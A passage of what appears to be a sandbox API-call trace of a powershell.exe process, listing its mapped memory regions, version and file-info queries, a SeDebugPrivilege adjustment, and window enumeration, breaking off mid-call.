0x631414b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 889 start_va = 0x63100000 end_va = 0x63137fff entry_point = 0x6310990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 890 start_va = 0x6530000 end_va = 0x660ffff entry_point = 0x0 region_type = private name = "private_0x0000000006530000" filename = "" Region: id = 891 start_va = 0x4aa0000 end_va = 0x4aa3fff entry_point = 0x4aa0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 892 start_va = 0x6590000 end_va = 0x65cffff entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 893 start_va = 0x65d0000 end_va = 0x660ffff entry_point = 0x0 region_type = private name = "private_0x00000000065d0000" filename = "" Region: id = 894 start_va = 0x66a0000 end_va = 0x66dffff entry_point = 0x0 region_type = private name = "private_0x00000000066a0000" filename = "" Region: id = 895 start_va = 0x7ef2d000 end_va = 0x7ef2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef2d000" filename = "" Region: id = 896 start_va = 0x5580000 end_va = 0x55affff entry_point = 0x5580000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 897 start_va = 0x4ab0000 end_va = 0x4ab3fff entry_point = 0x4ab0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 898 start_va = 0x6220000 end_va = 0x6285fff entry_point = 0x6220000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 899 start_va = 0x754b0000 end_va = 0x755e5fff entry_point = 0x754b1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 900 start_va = 0x75b60000 end_va = 0x75c54fff entry_point = 0x75b61865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 901 start_va = 0x75fa0000 end_va = 0x7619afff entry_point = 0x75fa22d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 902 start_va = 0x5530000 end_va = 0x5530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005530000" filename = "" Region: id = 903 start_va = 0x67d30000 end_va = 0x67d36fff entry_point = 0x67d32a6f region_type = mapped_file name = "ntvdm64.dll" filename = "\\Windows\\SysWOW64\\ntvdm64.dll" (normalized: "c:\\windows\\syswow64\\ntvdm64.dll") Region: id = 904 start_va = 0x55f0000 end_va = 0x55f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055f0000" filename = "" Region: id = 905 start_va = 0x66a0000 end_va = 0x66dffff entry_point = 0x0 region_type = private name = "private_0x00000000066a0000" filename = "" Region: id = 906 start_va = 0x5e3a0000 end_va = 0x5e42cfff entry_point = 0x5e3c97d0 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll") Region: id = 907 start_va = 0x5fd0000 end_va = 0x5fd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005fd0000" filename = "" Region: id = 908 start_va = 0x66e0000 end_va = 0x67dffff entry_point = 0x0 region_type = private name = "private_0x00000000066e0000" filename = "" Region: id = 909 start_va = 0x6800000 end_va = 0x683ffff entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 910 start_va = 0x6880000 end_va = 0x68bffff entry_point = 0x0 region_type = private name = "private_0x0000000006880000" filename = "" Region: id = 911 start_va = 0x7ef2d000 end_va = 0x7ef2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef2d000" filename = "" Region: id = 942 start_va = 0x67d30000 end_va = 0x67d38fff entry_point = 0x67d315a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 23 os_tid = 0xa98 [0062.806] GlobalMemoryStatus (in: lpBuffer=0xcf1dc | out: lpBuffer=0xcf1dc) [0068.556] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0068.761] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0068.761] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0068.761] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0068.761] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0070.468] GetVersionExW (in: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.468] GetLastError () returned 0x2 [0070.471] GetVersionExW (in: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.471] GetLastError () returned 0x2 [0070.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce2dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.484] GetLastError () returned 0x2 [0070.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce2f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.492] GetLastError () returned 0x2 [0070.492] GetVersionExW (in: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.492] GetLastError () returned 0x2 [0070.495] SetErrorMode (uMode=0x1) returned 0x1 [0070.496] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", fInfoLevelId=0x0, lpFileInformation=0xce778 | out: lpFileInformation=0xce778) returned 1 [0070.497] GetLastError () returned 0x2 [0070.497] SetErrorMode (uMode=0x1) returned 0x1 [0070.504] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xce7fc | out: lpdwHandle=0xce7fc) returned 0x94c [0070.509] GetLastError () returned 0x0 [0070.511] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a553a0 | out: lpData=0x2a553a0) returned 1 [0070.519] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xce7c8, puLen=0xce7c4 | out: lplpBuffer=0xce7c8*=0x2a5543c, puLen=0xce7c4) returned 1 [0070.523] lstrlenW (lpString="䅁") returned 1 [0070.540] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a55518, puLen=0xce740) returned 1 [0070.541] lstrlenW (lpString="Microsoft Corporation") returned 21 [0070.543] lstrcpyW (in: lpString1=0x2d1690, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0070.543] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a5556c, puLen=0xce740) returned 1 [0070.543] lstrlenW (lpString="System.Management.Automation") returned 28 [0070.543] lstrcpyW (in: lpString1=0x2d1690, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0070.543] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a555c8, puLen=0xce740) returned 1 [0070.543] lstrlenW (lpString="6.1.7601.17514") returned 14 [0070.543] lstrcpyW (in: lpString1=0x2d1690, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0070.544] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a55608, puLen=0xce740) returned 1 [0070.544] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0070.544] lstrcpyW (in: lpString1=0x2d1690, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0070.544] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a55670, puLen=0xce740) returned 1 [0070.544] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0070.544] lstrcpyW (in: lpString1=0x2d1690, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0070.544] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a5570c, puLen=0xce740) returned 1 [0070.544] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0070.544] lstrcpyW (in: lpString1=0x2d1690, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0070.544] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a55770, puLen=0xce740) returned 1 [0070.544] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0070.544] lstrcpyW (in: lpString1=0x2d1690, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0070.545] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a557ec, puLen=0xce740) returned 1 [0070.545] lstrlenW (lpString="6.1.7601.17514") returned 14 [0070.545] lstrcpyW (in: lpString1=0x2d1690, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0070.545] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x2a55494, puLen=0xce740) returned 1 [0070.545] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0070.545] lstrcpyW (in: lpString1=0x2d1690, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0070.545] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x0, puLen=0xce740) returned 0 [0070.545] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x0, puLen=0xce740) returned 0 [0070.545] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xce744, puLen=0xce740 | out: lplpBuffer=0xce744*=0x0, puLen=0xce740) returned 0 [0070.545] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xce738, puLen=0xce734 | out: lplpBuffer=0xce738*=0x2a5543c, puLen=0xce734) returned 1 [0070.547] VerLanguageNameW (in: wLang=0x0, szLang=0x2d1690, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0070.552] VerQueryValueW (in: pBlock=0x2a553a0, lpSubBlock="\\", lplpBuffer=0xce74c, puLen=0xce748 | out: lplpBuffer=0xce74c*=0x2a553c8, puLen=0xce748) returned 1 [0070.564] GetCurrentProcessId () returned 0xa94 [0070.627] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcdf84 | out: lpLuid=0xcdf84*(LowPart=0x14, HighPart=0)) returned 1 [0070.630] GetLastError () returned 0x0 [0070.633] GetCurrentProcess () returned 0xffffffff [0070.633] GetLastError () returned 0x0 [0070.637] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xcdf80 | out: TokenHandle=0xcdf80*=0x2f8) returned 1 [0070.637] GetLastError () returned 0x0 [0070.651] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x2a57ee0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0070.652] GetLastError () returned 0x514 [0070.654] CloseHandle (hObject=0x2f8) returned 1 [0070.655] GetLastError () returned 0x514 [0070.664] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa94) returned 0x2f8 [0070.664] GetLastError () returned 0x514 [0070.704] EnumProcessModules (in: hProcess=0x2f8, lphModule=0x2a57f24, cb=0x100, lpcbNeeded=0xce774 | out: lphModule=0x2a57f24, lpcbNeeded=0xce774) returned 1 [0070.705] GetLastError () returned 0x514 [0070.711] GetModuleInformation (in: hProcess=0x2f8, hModule=0x22160000, lpmodinfo=0x2a58064, cb=0xc | out: lpmodinfo=0x2a58064*(lpBaseOfDll=0x22160000, SizeOfImage=0x72000, EntryPoint=0x22167363)) returned 1 [0070.711] GetLastError () returned 0x514 [0070.715] GetModuleBaseNameW (in: hProcess=0x2f8, hModule=0x22160000, lpBaseName=0x2d1e50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0070.715] GetLastError () returned 0x514 [0070.717] GetModuleFileNameExW (in: hProcess=0x2f8, hModule=0x22160000, lpFilename=0x2d1e50, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0070.717] GetLastError () returned 0x514 [0070.718] CloseHandle (hObject=0x2f8) returned 1 [0070.719] GetLastError () returned 0x514 [0070.723] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa94) returned 0x2f8 [0070.723] GetLastError () returned 0x514 [0070.726] GetExitCodeProcess (in: hProcess=0x2f8, lpExitCode=0x2a57514 | out: lpExitCode=0x2a57514*=0x103) returned 1 [0070.726] GetLastError () returned 0x514 [0070.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3a55278, Length=0x20000, ResultLength=0xce7bc | out: SystemInformation=0x3a55278, ResultLength=0xce7bc*=0x9b20) returned 0x0 [0070.785] EnumWindows (lpEnumFunc=0x2923612, lParam=0x0) returned 1 [0070.789] GetWindowThreadProcessId (in: hWnd=0x200ca, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.789] GetLastError () returned 0x514 [0070.790] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.790] GetLastError () returned 0x514 [0070.790] GetWindowThreadProcessId (in: hWnd=0x200f4, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.790] GetLastError () returned 0x514 [0070.790] GetWindowThreadProcessId (in: hWnd=0x200e4, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.790] GetLastError () returned 0x514 [0070.790] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x73c [0070.791] GetLastError () returned 0x514 [0070.791] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x7ec [0070.791] GetLastError () returned 0x514 [0070.791] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.791] GetLastError () returned 0x514 [0070.791] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.792] GetLastError () returned 0x514 [0070.792] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.792] GetLastError () returned 0x514 [0070.792] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.792] GetLastError () returned 0x514 [0070.792] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.792] GetLastError () returned 0x514 [0070.792] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.793] GetLastError () returned 0x514 [0070.793] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.793] GetLastError () returned 0x514 [0070.793] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.793] GetLastError () returned 0x514 [0070.793] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.793] GetLastError () returned 0x514 [0070.794] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x498 [0070.794] GetLastError () returned 0x514 [0070.794] GetWindowThreadProcessId (in: hWnd=0x50096, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.794] GetLastError () returned 0x514 [0070.794] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.794] GetLastError () returned 0x514 [0070.794] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0xa98 [0070.794] GetLastError () returned 0x514 [0070.797] GetWindow (hWnd=0x10208, uCmd=0x4) returned 0x0 [0070.800] IsWindowVisible (hWnd=0x10208) returned 0 [0070.800] GetWindowThreadProcessId (in: hWnd=0x201b0, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.800] GetLastError () returned 0x514 [0070.801] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.801] GetLastError () returned 0x514 [0070.801] GetWindowThreadProcessId (in: hWnd=0x201b4, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.801] GetLastError () returned 0x514 [0070.801] GetWindowThreadProcessId (in: hWnd=0x201d2, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.801] GetLastError () returned 0x514 [0070.801] GetWindowThreadProcessId (in: hWnd=0x301b6, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.801] GetLastError () returned 0x514 [0070.802] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x9d0 [0070.802] GetLastError () returned 0x514 [0070.802] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.802] GetLastError () returned 0x514 [0070.802] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.802] GetLastError () returned 0x514 [0070.802] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x878 [0070.802] GetLastError () returned 0x514 [0070.803] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x868 [0070.803] GetLastError () returned 0x514 [0070.803] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x858 [0070.803] GetLastError () returned 0x514 [0070.803] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x848 [0070.803] GetLastError () returned 0x514 [0070.803] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x834 [0070.803] GetLastError () returned 0x514 [0070.804] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x824 [0070.804] GetLastError () returned 0x514 [0070.804] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x814 [0070.804] GetLastError () returned 0x514 [0070.804] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x804 [0070.804] GetLastError () returned 0x514 [0070.804] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x214 [0070.805] GetLastError () returned 0x514 [0070.805] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x49c [0070.805] GetLastError () returned 0x514 [0070.805] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x530 [0070.805] GetLastError () returned 0x514 [0070.805] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x6e4 [0070.805] GetLastError () returned 0x514 [0070.805] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x7e8 [0070.806] GetLastError () returned 0x514 [0070.806] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x64 [0070.806] GetLastError () returned 0x514 [0070.806] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x390 [0070.806] GetLastError () returned 0x514 [0070.806] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4a0 [0070.808] GetLastError () returned 0x514 [0070.809] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x52c [0070.809] GetLastError () returned 0x514 [0070.809] GetWindowThreadProcessId (in: hWnd=0x30150, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x608 [0070.809] GetLastError () returned 0x514 [0070.809] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x600 [0070.809] GetLastError () returned 0x514 [0070.809] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x714 [0070.810] GetLastError () returned 0x514 [0070.810] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.810] GetLastError () returned 0x514 [0070.810] GetWindowThreadProcessId (in: hWnd=0x200ac, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.810] GetLastError () returned 0x514 [0070.810] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.810] GetLastError () returned 0x514 [0070.810] GetWindowThreadProcessId (in: hWnd=0x200b2, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.811] GetLastError () returned 0x514 [0070.811] GetWindowThreadProcessId (in: hWnd=0x200ba, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.811] GetLastError () returned 0x514 [0070.811] GetWindowThreadProcessId (in: hWnd=0x300c8, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.811] GetLastError () returned 0x514 [0070.811] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.811] GetLastError () returned 0x514 [0070.811] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x73c [0070.812] GetLastError () returned 0x514 [0070.812] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x72c [0070.812] GetLastError () returned 0x514 [0070.812] GetWindowThreadProcessId (in: hWnd=0x2012e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x73c [0070.812] GetLastError () returned 0x514 [0070.812] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x72c [0070.812] GetLastError () returned 0x514 [0070.813] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x73c [0070.813] GetLastError () returned 0x514 [0070.813] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x714 [0070.813] GetLastError () returned 0x514 [0070.813] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x714 [0070.813] GetLastError () returned 0x514 [0070.813] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x558 [0070.813] GetLastError () returned 0x514 [0070.814] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 